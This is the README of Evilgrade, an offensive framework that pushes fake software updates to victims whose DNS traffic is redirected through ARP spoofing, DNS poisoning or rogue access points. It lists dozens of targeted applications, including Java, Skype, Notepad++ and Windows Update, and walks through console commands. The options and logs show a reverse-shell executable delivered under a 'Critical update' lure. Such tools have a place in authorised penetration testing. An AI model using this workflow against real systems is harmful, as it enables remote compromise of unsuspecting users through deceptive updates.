Evilgrade
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.
Install / Use
/learn @infobyte/EvilgradeREADME
<p align="center" >
<a href="https://www.faradaysec.com" target="_blank"><img src="https://1.bp.blogspot.com/-DHDtcxnAujs/Xp5TEcdoeeI/AAAAAAAASZQ/fbSKCoPnFjUwhbPN0bUQyIpSWnPKRMhZACNcBGAsYHQ/s1600/ad_kitploitadv6.png"></a>
</p>
<p align="center" >
Faraday Security Research
-- | ISR-evilgrade | www.faradaysec.com | --
</p>
.:: [BRIEF OVERVIEW] ::.
Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.
* When should I use evilgrade?
This framework comes into play when the attacker is able to make hostname redirections (manipulation of victim's dns traffic), and such thing can be done on 2 scenarios:
Internal scenery:
- Internal DNS access
- ARP spoofing
- DNS Cache Poisoning
- DHCP spoofing
- TCP hijacking
- Wi-Fi Access Point impersonation
External scenery:
- Internal DNS access
- DNS Cache Poisoning
* How does it work?
Evilgrade works with modules, in each module there's an implemented structure which is needed to emulate a fake update for an specific application/system.
* What OS are supported?
ISR-Evilgrade is crossplatform, it only depends of having an appropriate payload for the right target platform to be exploited.
Implemented modules:
- Freerip 3.30
- Jet photo 4.7.2
- Teamviewer 5.1.9385
- ISOpen 4.5.0
- Istat.
- Gom 2.1.25.5015
- Atube catcher 1.0.300
- Vidbox 7.5
- Ccleaner 2.30.1130
- Fcleaner 1.2.9.409
- Allmynotes 1.26
- Notepad++ 5.8.2
- Java 1.6.0_22 winxp/win7
- aMSN 0.98.3
- Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
- Mirc 7.14
- Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
- Dap 9.5.0.3
- Winscp 4.2.9
- AutoIt Script 3.3.6.1
- Clamwin 0.96.0.1
- AppTapp Installer 3.11 (Iphone/Itunes)
- getjar (facebook.com)
- Google Analytics Javascript injection
- Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
- Winamp 5.581
- TechTracker (cnet) 1.3.1 (Build 55)
- Nokiasoftware firmware update 2.4.8es - (Windows software)
- Nokia firmware v20.2.011
- BSplayer 2.53.1034
- Apt ( < Ubuntu 10.04 LTS)
- Ubertwitter 4.6 (0.971)
- Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
- Cpan 1.9402
- VirtualBox (3.2.8 )
- Express talk
- Filezilla
- Flashget
- Miranda
- Orbit
- Photoscape.
- Panda Antirootkit
- Skype
- Sunbelt
- Superantispyware
- Trillian <= 5.0.0.26
- Adium 1.3.10 (Sparkle Framework)
- VMware
- more...
- /docs/CHANGES
.:: [MAIN USAGE] ::.
It works similar to an IOS console
evilgrade>help
Type 'help command' for more detailed help on a command.
Commands:
configure - Configure <module-name> - no help available
exit - exits the program
help - prints this screen, or help on 'command'
reload - Reload to update all the modules - no help available
restart - Restart webserver - no help available
set - Configure variables - no help available
show - Display information of <object>.
start - Start webserver - no help available
status - Get webserver status - no help available
stop - Stop webserver - no help available
version - Display framework version. - no help available
Object:
options - Show options of current module.
vhosts - Show VirtualHosts of current module.
modules - List all modules available for use.
active - Show active modules.
List implemented modules
evilgrade>show modules
List of modules:
===============
...
...
...
- 63 modules available.
Configure a specified module
evilgrade>conf sunjava
evilgrade(sunjava)>
Show all VirtualHosts.
VirtualHost field contains the domains that our webserver is going to emulate for us.
evilgrade>show vhosts
Virtual hosts:
=============
[
"java.sun.com",
"javadl-esd.sun.com",
...
...
...
]
Show options of current module.
agent: This is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation (see ADVANCED).
evilgrade(sunjava)>show options
Display options:
===============
Name = Sun Microsystems Java
Version = 2.0
Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
Description = ""
VirtualHost = "java.sun.com|javadl-esd.sun.com"
.-------------------------------------------------------------------------------------------------------------------------.
| Name | Default | Description |
+--------------+-------------------------------------------------+--------------------------------------------------------+
| website | http://java.com/moreinfolink | Website displayed in the update |
| enable | 1 | Status |
| atitle | Critical vulnerability | Title name to be displayed in the systray item popup |
| arg | | Arg passed to Agent |
| adescription | This critical update fix internal vulnerability | Description to be displayed in the systray item popup |
| description | This critical update fix internal vulnerability | Description to be displayed during the update |
| agent | ./agent/reverseshellsign.exe | Agent to inject |
| title | Critical update | Title name displayed in the update |
'--------------+-------------------------------------------------+--------------------------------------------------------'
Start services (DNS Server and WebServer)
evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
#### Waiting for victims
evilgrade>
[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"
evilgrade>
[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"
evilgrade>
[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"
evilgrade>
[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"
Show status and victims logs
evilgrade>show status
Webserver (pid 4134) already running
Users status:
============
.---------------------------------------------------------------------------------------------------------------.
| Client | Module | Status | Md5,Cmd,File |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" |
'----------------+------------------+--------+------------------------------------------------------------------'
.:: [DEEP USAGE] ::.
Commands
configure / conf - Configure <module-name>
Example:
evilgrade>configure sunjava
evilgrade(sunjava)>
evilgrade>conf sunjava
evilgrade(sunjava)>
## 'conf' takes us back to the global configuration
evilgrade(sunjava)>conf
evilgrade>
##
reload - Reload to get all modules update (to refresh loaded modules, useful on development)
start - Start webserver
stop - Stop webserver (fake update server)
Example:
evilgrade>start
evilgrade>
[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
#######################################
Example:
-------
evilgrade>stop
Stopping WEBSERVER [OK]
Stopping DNSSERVER [OK]
#######################################
restart - Restart services (WebServer and DNS Server)
stops and starts again
#######################################
status - Get webserver and victims status
Example:
-------
evilgrade>show status
Webserver (pid 4134) already running
Users status:
============
.---------------------------------------------------------------------------------------------------------------.
| Client | Module | Status | Md5,Cmd,File |
+----------------+------------------+--------+------------------------------------------------------------------+
| 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" |
'----------------+------------------+--------+------------------------------------------------------------------'
#######################################
show - Display information of <object>.
#######################################
show active - Display active modules in the webserver
#######################################
show modules - Display implemented modules
#########################################
show options - Display modules/global options
Example:
-------
evilgrade>show options
Display options:
===============
.-----------------------------------------------------------------------------------.
| Name | Default | Description |
+-------------+-----------+------------------
Related Skills
healthcheck
337.7kHost security hardening and risk-tolerance configuration for OpenClaw deployments
node-connect
337.7kDiagnose OpenClaw node connection and pairing failures for Android, iOS, and macOS companion apps
prose
337.7kOpenProse VM skill pack. Activate on any `prose` command, .prose files, or OpenProse mentions; orchestrates multi-agent workflows.
frontend-design
83.3kCreate distinctive, production-grade frontend interfaces with high design quality. Use this skill when the user asks to build web components, pages, or applications. Generates creative, polished code that avoids generic AI aesthetics.
